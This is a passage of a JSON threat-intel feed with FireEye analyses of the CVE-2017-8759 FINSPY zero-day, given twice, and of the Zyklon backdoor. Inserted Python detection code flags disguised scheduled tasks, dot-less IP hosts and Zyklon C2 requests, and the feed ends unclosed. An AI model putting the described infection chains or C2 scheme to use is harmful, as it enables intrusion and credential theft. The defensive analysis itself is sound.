"FIREEYE:8DF2C812CF325AAB2F348273A03789F5", "href": "https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-10-11T08:32:49", "description": "FireEye recently detected a malicious Microsoft Office RTF document that leveraged 
[CVE-2017-8759](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8759>), a SOAP [WSDL](<https://msdn.microsoft.com/en-us/library/ms996486.aspx>) parser code injection vulnerability. This vulnerability allows a malicious actor to inject arbitrary code during the parsing of SOAP WSDL definition contents. FireEye analyzed a Microsoft Word document where attackers used the arbitrary code injection to download and execute a Visual Basic script that contained PowerShell commands.\n\nFireEye shared the details of the vulnerability with Microsoft and has been coordinating public disclosure timed with the release of a patch to address the vulnerability and security guidance, which can be found [here](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8759>).\n\nFireEye email, endpoint and network products detected the malicious documents.\n\n#### Vulnerability Used to Target Russian Speakers\n\nThe malicious document, \u201c\u041f\u0440\u043e\u0435\u043a\u0442.doc\u201d (MD5: fe5c4d6bb78e170abf5cf3741868ea4c), might have been used to target a Russian speaker. Upon successful exploitation of CVE-2017-8759, the document downloads multiple components (details follow), and eventually launches a FINSPY payload (MD5: a7b990d5f57b244dd17e9a937a41e7f5).\n\nFINSPY malware, also reported as FinFisher or [WingBird](<http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft_Security_Intelligence_Report_Volume_21_English.pdf>), is available for purchase as part of a \u201clawful intercept\u201d capability. Based on this and previous use of [FINSPY](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199_useda.html>), we assess with moderate confidence that this malicious document was used by a nation-state to target a Russian-speaking entity for cyber espionage purposes. 
Additional detections by FireEye\u2019s Dynamic Threat Intelligence system indicate that related activity, though potentially for a different client, might have occurred as early as July 2017.\n\n#### CVE-2017-8759 WSDL Parser Code Injection\n\nA code injection vulnerability exists in the WSDL parser module within the PrintClientProxy method ([http://referencesource.microsoft.com/ - System.Runtime.Remoting/metadata/wsdlparser.cs,6111](<http://referencesource.microsoft.com/#System.Runtime.Remoting/metadata/wsdlparser.cs,6111>)). The IsValidUrl method does not perform correct validation when the provided data contains a CRLF sequence. This allows an attacker to inject and execute arbitrary code. A portion of the vulnerable code is shown in Figure 1.\n\n \nFigure 1: Vulnerable WSDL Parser\n\nWhen multiple _address_ definitions are provided in a SOAP response, the code inserts the \u201c//base.ConfigureProxy(this.GetType(),\u201d string after the first address, commenting out the remaining addresses. However, if a CRLF sequence is in the additional addresses, the code following the CRLF will not be commented out. Figure 2 shows that, due to the lack of CRLF validation, a System.Diagnostics.Process.Start method call is injected. The generated code will be compiled by csc.exe of the .NET Framework, and loaded by the Office executables as a DLL.\n\n \nFigure 2: SOAP definition VS Generated code\n\n#### The In-the-Wild Attacks\n\nThe attacks that FireEye observed in the wild leveraged a Rich Text Format (RTF) document, similar to the [CVE-2017-0199](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html>) documents we previously reported on. The malicious sample contained an embedded SOAP moniker to facilitate exploitation (Figure 3).\n\n \nFigure 3: SOAP Moniker\n\nThe payload retrieves the malicious SOAP WSDL definition from an attacker-controlled server. 
The WSDL parser, implemented in System.Runtime.Remoting.ni.dll of the .NET Framework, parses the content and generates a .cs source file in the working directory. The csc.exe of the .NET Framework then compiles the generated source code into a library, namely http[url path].dll. Microsoft Office then loads the library, completing the exploitation stage. Figure 4 shows an example library loaded as a result of exploitation.\n\n \nFigure 4: DLL loaded\n\nUpon successful exploitation, the injected code creates a new process and leverages mshta.exe to retrieve an HTA script named \u201cword.db\u201d from the same server. The HTA script removes the source code, compiled DLL and the PDB files from disk and then downloads and executes the FINSPY malware named \u201cleft.jpg,\u201d which in spite of the .jpg extension and \u201cimage/jpeg\u201d content-type, is actually an executable. Figure 5 shows the details of the PCAP of this malware transfer.\n\n \nFigure 5: Live requests\n\nThe malware will be placed at %appdata%\\Microsoft\\Windows\\OfficeUpdte-KB[ 6 random numbers ].exe. Figure 6 shows the process creation chain under Process Monitor.\n\n \nFigure 6: Process Created Chain\n\n#### The Malware\n\nThe \u201cleft.jpg\u201d (md5: a7b990d5f57b244dd17e9a937a41e7f5) is a variant of FINSPY. It leverages heavily obfuscated code that employs a built-in virtual machine \u2013 among other anti-analysis techniques \u2013 to make reversing more difficult. As likely another unique anti-analysis technique, it parses its own full path and searches for the string representation of its own MD5 hash. Many resources, such as analysis tools and sandboxes, rename files/samples to their MD5 hash in order to ensure unique filenames. This variant runs with a mutex of \"WininetStartupMutex0\".\n\n#### Conclusion\n\nCVE-2017-8759 is the second zero-day vulnerability used to distribute FINSPY uncovered by FireEye in 2017. 
These exposures demonstrate the significant resources available to \u201clawful intercept\u201d companies and their customers. Furthermore, FINSPY has been sold to multiple clients, suggesting the vulnerability was being used against other targets.\n\nIt is possible that CVE-2017-8759 was being used by additional actors. While we have not found evidence of this, the zero day being used to distribute FINSPY in April 2017, CVE-2017-0199 was simultaneously being used by a financially motivated actor. If the actors behind FINSPY obtained this vulnerability from the same source used previously, it is possible that source sold it to additional actors.\n\n#### Acknowledgement\n\nThank you to Dhanesh Kizhakkinan, Joseph Reyes, FireEye Labs Team, FireEye FLARE Team and FireEye iSIGHT Intelligence for their contributions to this blog. We also thank everyone from the Microsoft Security Response Center (MSRC) who worked with us on this issue.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-09-12T13:00:00", "type": "fireeye", "title": "FireEye Uncovers CVE-2017-8759: Zero-Day Used in the Wild to Distribute FINSPY", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199", "CVE-2017-8759"], "modified": "2017-09-12T13:00:00", "id": "FIREEYE:A19A2394490AB386D95215A17EEA2FC0", "href": "https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-08T00:43:24", "description": "FireEye recently detected a malicious Microsoft Office RTF document that leveraged [CVE-2017-8759](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8759>), a SOAP [WSDL](<https://msdn.microsoft.com/en-us/library/ms996486.aspx>) parser code injection vulnerability. This vulnerability allows a malicious actor to inject arbitrary code during the parsing of SOAP WSDL definition contents. FireEye analyzed a Microsoft Word document where attackers used the arbitrary code injection to download and execute a Visual Basic script that contained PowerShell commands.\n\nFireEye shared the details of the vulnerability with Microsoft and has been coordinating public disclosure timed with the release of a patch to address the vulnerability and security guidance, which can be found [here](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8759>).\n\nFireEye email, endpoint and network products detected the malicious documents.\n\n#### Vulnerability Used to Target Russian Speakers\n\nThe malicious document, \u201c\u041f\u0440\u043e\u0435\u043a\u0442.doc\u201d (MD5: fe5c4d6bb78e170abf5cf3741868ea4c), might have been used to target a Russian speaker. 
Upon successful exploitation of CVE-2017-8759, the document downloads multiple components (details follow), and eventually launches a FINSPY payload (MD5: a7b990d5f57b244dd17e9a937a41e7f5).\n\nFINSPY malware, also reported as FinFisher or [WingBird](<http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft_Security_Intelligence_Report_Volume_21_English.pdf>), is available for purchase as part of a \u201clawful intercept\u201d capability. Based on this and previous use of [FINSPY](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199_useda.html>), we assess with moderate confidence that this malicious document was used by a nation-state to target a Russian-speaking entity for cyber espionage purposes. Additional detections by FireEye\u2019s Dynamic Threat Intelligence system indicate that related activity, though potentially for a different client, might have occurred as early as July 2017.\n\n#### CVE-2017-8759 WSDL Parser Code Injection\n\nA code injection vulnerability exists in the WSDL parser module within the PrintClientProxy method ([http://referencesource.microsoft.com/ - System.Runtime.Remoting/metadata/wsdlparser.cs,6111](<http://referencesource.microsoft.com/#System.Runtime.Remoting/metadata/wsdlparser.cs,6111>)). The IsValidUrl method does not perform correct validation when the provided data contains a CRLF sequence. This allows an attacker to inject and execute arbitrary code. A portion of the vulnerable code is shown in Figure 1.\n\n \nFigure 1: Vulnerable WSDL Parser\n\nWhen multiple _address_ definitions are provided in a SOAP response, the code inserts the \u201c//base.ConfigureProxy(this.GetType(),\u201d string after the first address, commenting out the remaining addresses. However, if a CRLF sequence is in the additional addresses, the code following the CRLF will not be commented out. Figure 2 shows that, due to the lack of CRLF validation, a System.Diagnostics.Process.Start method call is injected. 
The generated code will be compiled by csc.exe of the .NET Framework, and loaded by the Office executables as a DLL.\n\n \nFigure 2: SOAP definition VS Generated code\n\n#### The In-the-Wild Attacks\n\nThe attacks that FireEye observed in the wild leveraged a Rich Text Format (RTF) document, similar to the [CVE-2017-0199](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html>) documents we previously reported on. The malicious sample contained an embedded SOAP moniker to facilitate exploitation (Figure 3).\n\n \nFigure 3: SOAP Moniker\n\nThe payload retrieves the malicious SOAP WSDL definition from an attacker-controlled server. The WSDL parser, implemented in System.Runtime.Remoting.ni.dll of the .NET Framework, parses the content and generates a .cs source file in the working directory. The csc.exe of the .NET Framework then compiles the generated source code into a library, namely http[url path].dll. Microsoft Office then loads the library, completing the exploitation stage. Figure 4 shows an example library loaded as a result of exploitation.\n\n \nFigure 4: DLL loaded\n\nUpon successful exploitation, the injected code creates a new process and leverages mshta.exe to retrieve an HTA script named \u201cword.db\u201d from the same server. The HTA script removes the source code, compiled DLL and the PDB files from disk and then downloads and executes the FINSPY malware named \u201cleft.jpg,\u201d which in spite of the .jpg extension and \u201cimage/jpeg\u201d content-type, is actually an executable. Figure 5 shows the details of the PCAP of this malware transfer.\n\n \nFigure 5: Live requests\n\nThe malware will be placed at %appdata%\\Microsoft\\Windows\\OfficeUpdte-KB[ 6 random numbers ].exe. Figure 6 shows the process creation chain under Process Monitor.\n\n \nFigure 6: Process Created Chain\n\n#### The Malware\n\nThe \u201cleft.jpg\u201d (md5: a7b990d5f57b244dd17e9a937a41e7f5) is a variant of FINSPY. 
It leverages heavily obfuscated code that employs a built-in virtual machine \u2013 among other anti-analysis techniques \u2013 to make reversing more difficult. As likely another unique anti-analysis technique, it parses its own full path and searches for the string representation of its own MD5 hash. Many resources, such as analysis tools and sandboxes, rename files/samples to their MD5 hash in order to ensure unique filenames. This variant runs with a mutex of \"WininetStartupMutex0\".\n\n#### Conclusion\n\nCVE-2017-8759 is the second zero-day vulnerability used to distribute FINSPY uncovered by FireEye in 2017. These exposures demonstrate the significant resources available to \u201clawful intercept\u201d companies and their customers. Furthermore, FINSPY has been sold to multiple clients, suggesting the vulnerability was being used against other targets.\n\nIt is possible that CVE-2017-8759 was being used by additional actors. While we have not found evidence of this, the zero day being used to distribute FINSPY in April 2017, CVE-2017-0199 was simultaneously being used by a financially motivated actor. If the actors behind FINSPY obtained this vulnerability from the same source used previously, it is possible that source sold it to additional actors.\n\n#### Acknowledgement\n\nThank you to Dhanesh Kizhakkinan, Joseph Reyes, FireEye Labs Team, FireEye FLARE Team and [FireEye iSIGHT Intelligence](<https://www.fireeye.com/solutions/isight-cyber-threat-intelligence-subscriptions.html>) for their contributions to this blog. 
We also thank everyone from the Microsoft Security Response Center (MSRC) who worked with us on this issue.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-09-12T13:00:00", "type": "fireeye", "title": "FireEye Uncovers CVE-2017-8759: Zero-Day Used in the Wild to Distribute FINSPY", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199", "CVE-2017-8759"], "modified": "2017-09-12T13:00:00", "id": "FIREEYE:E28F2F7E1B1F4BDA33635C841E315BCA", "href": "https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-11-04T00:24:50", "description": "#### Introduction\n\nFireEye researchers recently observed threat actors leveraging relatively new vulnerabilities in Microsoft Office to spread Zyklon HTTP malware. 
Zyklon has been observed in the wild since early 2016 and provides myriad sophisticated capabilities.\n\nZyklon is a publicly available, full-featured backdoor capable of keylogging, password harvesting, downloading and executing additional plugins, conducting distributed denial-of-service (DDoS) attacks, and self-updating and self-removal. The malware may communicate with its command and control (C2) server over The Onion Router (Tor) network if configured to do so. The malware can download several plugins, some of which include features such as cryptocurrency mining and password recovery from browsers and email software. Zyklon also provides a very efficient mechanism to monitor its spread and impact.\n\n#### Infection Vector\n\nWe have observed this recent wave of Zyklon malware being delivered primarily through spam emails. The email typically arrives with an attached ZIP file containing a malicious DOC file (Figure 1 shows a sample lure).\n\nThe following industries have been the primary targets in this campaign:\n\n * Telecommunications\n * Insurance\n * Financial Services\n\n \nFigure 1: Sample lure documents\n\n#### Attack Flow\n\n 1. Spam email arrives in the victim\u2019s mailbox as a ZIP attachment, which contains a malicious DOC file.\n 2. The document files exploit at least three known vulnerabilities in Microsoft Office, which we discuss in the Infection Techniques section. Upon execution in a vulnerable environment, the PowerShell-based payload takes over.\n 3. 
The PowerShell script is responsible for downloading the final payload from the C2 server and executing it.\n\nA visual representation of the attack flow and execution chain can be seen in Figure 2.\n\n \nFigure 2: Zyklon attack flow\n\n#### Infection Techniques\n\n##### CVE-2017-8759\n\nThis vulnerability was [discovered by FireEye](<https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html>) in September 2017, and it is a vulnerability we have observed being exploited in the wild.\n\nThe DOC file contains an embedded OLE Object that, upon execution, triggers the download of an additional DOC file from the stored URL (seen in Figure 3).\n\n \nFigure 3: Embedded URL in OLE object\n\n##### CVE-2017-11882\n\nSimilarly, we have also observed actors leveraging another recently [discovered](<https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html>) vulnerability (CVE-2017-11882) in Microsoft Office. Upon opening the malicious DOC attachment, an additional download is triggered from a stored URL within an embedded OLE Object (seen in Figure 4).\n\n \nFigure 4: Embedded URL in OLE object\n\n \nFigure 5: HTTP GET request to download the next level payload\n\nThe downloaded file, _doc.doc_, is XML-based and contains a PowerShell command (shown in Figure 6) that subsequently downloads the binary _Pause.ps1_.\n\n \nFigure 6: PowerShell command to download the Pause.ps1 payload\n\n##### Dynamic Data Exchange (DDE)\n\nDynamic Data Exchange (DDE) is the interprocess communication mechanism that is exploited to perform remote code execution. 
With the help of a PowerShell script (shown in Figure 7), the next payload (_Pause.ps1_) is downloaded.\n\n \nFigure 7: DDE technique used to download the Pause.ps1 payload\n\nOne of the unique approaches we have observed is the use of dot-less IP addresses (example: hxxp://258476380), where the 32-bit address is written as a single decimal integer; Windows URL handling still resolves such a host, but naive indicator matching on dotted-quad strings misses it.\n\nFigure 8 shows the network communication of the _Pause.ps1_ download.\n\n \nFigure 8: Network communication to download the Pause.ps1 payload\n\n#### Zyklon Delivery\n\nIn all these techniques, the same domain is used to download the next level payload (_Pause.ps1_), which is another PowerShell script that is Base64 encoded (as seen in Figure 8).\n\nThe _Pause.ps1_ script is responsible for resolving the APIs required for code injection, and it also carries the shellcode to be injected. The resolved APIs include VirtualAlloc(), memset(), and CreateThread(). Figure 9 shows the decoded Base64 code.\n\n \nFigure 9: Base64 decoded Pause.ps1\n\nThe injected code is responsible for downloading the final payload from the server (see Figure 10). The final stage payload is a PE executable built on the .NET Framework.\n\n \nFigure 10: Network traffic to download final payload (words.exe)\n\nOnce executed, the file performs the following activities:\n\n 1. Drops a copy of itself as %AppData%\\svchost.exe\\svchost.exe and drops an XML file containing a Task Scheduler task definition used for persistence (as shown in Figure 11).\n 2. Unpacks the core payload in memory via process hollowing. The MSIL file carries the packed core payload in its .NET resource section.\n 3. The unpacked code is Zyklon.\n\n \nFigure 11: XML configuration file to schedule the task\n\nThe Zyklon malware first retrieves the external IP address of the infected machine using the following services:\n\n * api.ipify[.]org\n * ip.anysrc[.]net\n * myexternalip[.]com\n * whatsmyip[.]com\n\nThe Zyklon executable contains another encrypted file in its .NET resource section named _tor_. 
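The persistence step above (a copy of the malware at %AppData%\svchost.exe\svchost.exe launched by a dropped Task Scheduler definition) is the kind of artifact a responder can check for at scale. The following Python is an added example, not code from the FireEye post or from the Zyklon authors: it parses a Task Scheduler XML definition and flags an action that runs from a user-writable profile directory or that reuses a Windows system binary name outside System32/SysWOW64. The two task definitions inside it are constructed for the example; the file from Figure 11 is not reproduced.

```python
"""Triage a Windows Task Scheduler task definition for Zyklon-style persistence.

Added example (not code from the FireEye post). It parses the Task Scheduler XML
schema (namespace http://schemas.microsoft.com/windows/2004/02/mit/task) and flags
an <Exec> action whose command runs from a per-user profile directory or borrows a
Windows system binary name, such as svchost.exe, outside System32/SysWOW64. The two
task definitions below are constructed for the example; they are not the file from
Figure 11 of the post.
"""
import ntpath
import re
import xml.etree.ElementTree as ET

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# System binary names that malware commonly reuses for its dropped copy.
SYSTEM_BINARY_NAMES = {"svchost.exe", "lsass.exe", "csrss.exe", "explorer.exe"}

# Profile-relative roots a scheduled task should rarely execute from, either as an
# environment variable or as an already-expanded C:\Users\<name>\AppData path.
USER_WRITABLE_PREFIXES = ("%appdata%", "%localappdata%", "%temp%", "%tmp%", "%userprofile%")
USER_WRITABLE_REGEX = re.compile(r"^[a-z]:\\users\\[^\\]+\\appdata\\", re.I)

# Constructed sample modelled on the post's description of a task that runs
# %AppData%\svchost.exe\svchost.exe (real task files are UTF-16; a str is used here).
SUSPICIOUS_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Principals><Principal id="Author"><RunLevel>LeastPrivilege</RunLevel></Principal></Principals>
  <Actions Context="Author">
    <Exec><Command>%AppData%\\svchost.exe\\svchost.exe</Command></Exec>
  </Actions>
</Task>"""

# Constructed benign contrast: a task whose action lives under System32.
BENIGN_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions Context="Author">
    <Exec><Command>%SystemRoot%\\System32\\svchost.exe</Command><Arguments>-k netsvcs</Arguments></Exec>
  </Actions>
</Task>"""


def _normalise(command: str) -> str:
    """Strip quotes/whitespace and lower-case for case-insensitive path checks."""
    return command.strip().strip('"').lower()


def runs_from_user_writable_location(command: str) -> bool:
    c = _normalise(command)
    return c.startswith(USER_WRITABLE_PREFIXES) or USER_WRITABLE_REGEX.match(c) is not None


def masquerades_as_system_binary(command: str) -> bool:
    """True when the file name is a known system binary but its directory is not
    System32/SysWOW64, e.g. %AppData%\\svchost.exe\\svchost.exe."""
    c = _normalise(command)
    if ntpath.basename(c) not in SYSTEM_BINARY_NAMES:
        return False
    parent = ntpath.dirname(c)
    return not (parent.endswith("\\system32") or parent.endswith("\\syswow64"))


def triage_task_xml(xml_text: str) -> list:
    """Return one finding per suspicious <Exec> action: command, arguments, reasons."""
    root = ET.fromstring(xml_text)
    findings = []
    for exec_node in root.findall(".//t:Actions/t:Exec", TASK_NS):
        cmd_node = exec_node.find("t:Command", TASK_NS)
        if cmd_node is None or not cmd_node.text:
            continue
        command = cmd_node.text.strip()
        args_node = exec_node.find("t:Arguments", TASK_NS)
        reasons = []
        if runs_from_user_writable_location(command):
            reasons.append("action runs from a user-writable profile directory")
        if masquerades_as_system_binary(command):
            reasons.append("system binary name outside System32/SysWOW64")
        if reasons:
            findings.append({
                "command": command,
                "arguments": (args_node.text or "").strip() if args_node is not None else "",
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for label, xml_text in (("suspicious", SUSPICIOUS_TASK_XML), ("benign", BENIGN_TASK_XML)):
        print(label, triage_task_xml(xml_text))
```

On a live host the same function can be pointed at every file under C:\Windows\System32\Tasks (decode them from UTF-16 first); the two checks are deliberately independent so that a task which only satisfies one of them is still surfaced.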
This file is decrypted and injected into an instance of _InstallUtil.exe_ (the .NET Framework installer utility), and functions as a Tor anonymizer.\n\n#### Command & Control Communication\n\nThe C2 communication of Zyklon is proxied through the Tor network. The malware sends a POST request to the C2 URL stored in the binary, with gate.php appended to it, and passes the parameter getkey=y. In response to this request, the C2 server returns a Base64-encoded RSA public key (seen in Figure 12).\n\n \nFigure 12: Zyklon public RSA key\n\nAfter the connection is established with the C2 server, the malware can communicate with its control server using the commands shown in Table 1.\n\n| Command | Action |\n|---|---|\n| sign | Requests system information |\n| settings | Requests settings from C2 server |\n| logs | Uploads harvested passwords |\n| wallet | Uploads harvested cryptocurrency wallet data |\n| proxy | Indicates SOCKS proxy port opened |\n| miner | Cryptocurrency miner commands |\n| error | Reports errors to C2 server |\n| ddos | DDoS attack commands |\n\nTable 1: Zyklon accepted commands\n\nThe following figures show the initial request and subsequent server response for the \u201csettings\u201d (Figure 13), \u201csign\u201d (Figure 14), and \u201cddos\u201d (Figure 15) commands.\n\n \nFigure 13: Zyklon issuing \u201csettings\u201d command and subsequent server response\n\n \nFigure 14: Zyklon issuing \u201csign\u201d command and subsequent server response\n\n \nFigure 15: Zyklon issuing \u201cddos\u201d command and subsequent server response\n\n#### Plugin Manager\n\nZyklon downloads a number of plugins from its C2 server. 
The plugin URL is stored in the file in the following format:\n\n * /plugin/index.php?plugin=<_Plugin_Name_>\n\nThe following plugins are found in the memory of the Zyklon malware:\n\n * /plugin/index.php?plugin=cuda\n * /plugin/index.php?plugin=minerd\n * /plugin/index.php?plugin=sgminer\n * /plugin/index.php?plugin=socks\n * /plugin/index.php?plugin=tor\n * /plugin/index.php?plugin=games\n * /plugin/index.php?plugin=software\n * /plugin/index.php?plugin=ftp\n * /plugin/index.php?plugin=email\n * /plugin/index.php?plugin=browser\n\nThe downloaded plugins are injected into Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe, a legitimate .NET Framework utility.\n\n#### Additional Features\n\nThe Zyklon malware offers the following additional capabilities (via plugins):\n\n##### Browser Password Recovery\n\nZyklon HTTP can recover passwords from popular web browsers, including:\n\n * Google Chrome\n * Mozilla Firefox\n * Internet Explorer\n * Opera Browser\n * Chrome Canary/SXS\n * CoolNovo Browser\n * Apple Safari\n * Flock Browser\n * SeaMonkey Browser\n * SRWare Iron Browser\n * Comodo Dragon Browser\n\n##### FTP Password Recovery\n\nZyklon currently supports FTP password recovery from the following FTP applications:\n\n * FileZilla\n * SmartFTP\n * FlashFXP\n * FTPCommander\n * Dreamweaver\n * WS_FTP\n\n##### Gaming Software Key Recovery\n\nZyklon can recover PC gaming software keys from the following games:\n\n * Battlefield\n * Call of Duty\n * FIFA\n * NFS\n * Age of Empires\n * Quake\n * The Sims\n * Half-Life\n * IGI\n * Star Wars\n\n##### Email Password Recovery\n\nZyklon may also collect email and instant-messaging passwords from the following applications:\n\n * Microsoft Outlook Express\n * Microsoft Outlook 2002/XP/2003/2007/2010/2013\n * Mozilla Thunderbird\n * Windows Live Mail 2012\n * IncrediMail, Foxmail v6.x - v7.x\n * Windows Live Messenger\n * MSN Messenger\n * Google Talk\n * GMail Notifier\n * PaltalkScene IM\n * Pidgin (Formerly Gaim) Messenger\n * Miranda Messenger\n * Windows Credential Manager\n\n##### License Key Recovery\n\nThe malware automatically detects and decrypts the license/serial keys of more than 200 popular pieces of software, including Office, SQL Server, Adobe, and Nero.\n\n##### Socks5 Proxy\n\nZyklon features the ability to establish a reverse Socks5 proxy server on infected host machines.\n\n##### Hijack Clipboard Bitcoin Address\n\nZyklon can monitor the clipboard and replace a Bitcoin address the user has copied with an address served by the actor\u2019s control server, diverting the payment.\n\n#### Zyklon Pricing\n\nResearchers identified different versions of Zyklon HTTP being advertised in a popular underground marketplace for the following prices:\n\n * Normal build: $75 (USD)\n * Tor-enabled build: $125 (USD)\n * Rebuild/Updates: $15 (USD)\n * Payment Method: Bitcoin (BTC)\n\n#### Conclusion\n\nThreat actors\u2019 adoption of recently discovered vulnerabilities in popular software, Microsoft Office in this case, only increases the likelihood of successful infections. These types of threats show why it is very important to ensure that all software is fully updated. Additionally, all industries should be on alert, as it is highly likely that the threat actors will eventually move outside the scope of their current targeting.\n\nAt the time of writing, the FireEye [Multi Vector Execution (MVX) engine](<https://www.fireeye.com/>) is able to recognize and block this threat. 
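Two details in the delivery and C2 description above lend themselves to a network-side check: the dot-less IP host (hxxp://258476380) used for the Pause.ps1 download, and the gate.php?getkey=y key request followed by /plugin/index.php?plugin=<name> fetches. The Python below is an added example, not code from the post or from the Zyklon authors. Its host parser goes beyond the single decimal form the post shows and implements the full inet_aton() rules (hex, octal and partial-label forms), which Windows URL handling also accepts; the request log in the block is constructed, and the hostnames in it are placeholders rather than the post's indicators.

```python
"""Canonicalise numeric ("dot-less") URL hosts and tag requests with Zyklon C2 markers.

Added example, not code from the FireEye post. The post notes the downloader's use
of a dot-less IP (hxxp://258476380) and describes the C2 as a POST to gate.php with
getkey=y followed by plugin fetches from /plugin/index.php?plugin=<name>. It goes
beyond the post in one respect: parse_numeric_host() applies the full inet_aton()
rules (decimal, 0x hex and leading-0 octal labels, one to four labels, the last
label filling the remaining bytes), because Windows URL handling accepts all of
those forms, not only the single decimal integer shown in the post. The request
log and the hostnames in it are constructed; they are not the post's IOCs.
"""
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

HEX_LABEL = re.compile(r"0[xX][0-9a-fA-F]+")
OCT_LABEL = re.compile(r"0[0-7]*")
DEC_LABEL = re.compile(r"[1-9][0-9]*")


def _parse_label(label: str) -> int:
    """One host label with inet_aton semantics: 0x = hex, leading 0 = octal."""
    if HEX_LABEL.fullmatch(label):
        return int(label[2:], 16)
    if OCT_LABEL.fullmatch(label):
        return int(label, 8)
    if DEC_LABEL.fullmatch(label):
        return int(label, 10)
    raise ValueError(label)


def parse_numeric_host(host: str):
    """Dotted-quad string for a numeric host in any inet_aton form, else None."""
    labels = host.split(".")
    if not 1 <= len(labels) <= 4:
        return None
    try:
        values = [_parse_label(lbl) for lbl in labels]
    except ValueError:
        return None
    head, last = values[:-1], values[-1]
    if any(v > 0xFF for v in head):
        return None
    remaining_bits = 32 - 8 * len(head)  # the last label fills the remaining bytes
    if last >= 1 << remaining_bits:
        return None
    packed = 0
    for v in head:
        packed = (packed << 8) | v
    packed = (packed << remaining_bits) | last
    return str(ipaddress.IPv4Address(packed))


# Constructed request log as (method, url); hosts and paths follow the post's
# description of the delivery chain and C2, not its published indicators.
SAMPLE_REQUESTS = [
    ("GET", "http://258476380/Pause.ps1"),
    ("GET", "http://0x0F68095C/words.exe"),
    ("POST", "http://c2.example.invalid/gate.php?getkey=y"),
    ("GET", "http://c2.example.invalid/plugin/index.php?plugin=minerd"),
    ("GET", "http://www.example.com/index.html"),
]


def classify_request(method: str, url: str) -> list:
    """Tags for one request: canonicalised numeric host, C2 key request, plugin fetch."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    query = parse_qs(parts.query)
    tags = []
    dotted = parse_numeric_host(host)
    if dotted is not None and dotted != host:
        tags.append(f"dotless-ip-host:{dotted}")
    if method.upper() == "POST" and parts.path.endswith("/gate.php") and query.get("getkey") == ["y"]:
        tags.append("zyklon-c2-key-request")
    if parts.path.endswith("/plugin/index.php") and query.get("plugin"):
        tags.append(f"zyklon-plugin-fetch:{query['plugin'][0]}")
    return tags


def scan_requests(requests) -> dict:
    """Map every URL that produced at least one tag to its tags."""
    hits = {}
    for method, url in requests:
        tags = classify_request(method, url)
        if tags:
            hits[url] = tags
    return hits


if __name__ == "__main__":
    for url, tags in scan_requests(SAMPLE_REQUESTS).items():
        print(url, tags)
```

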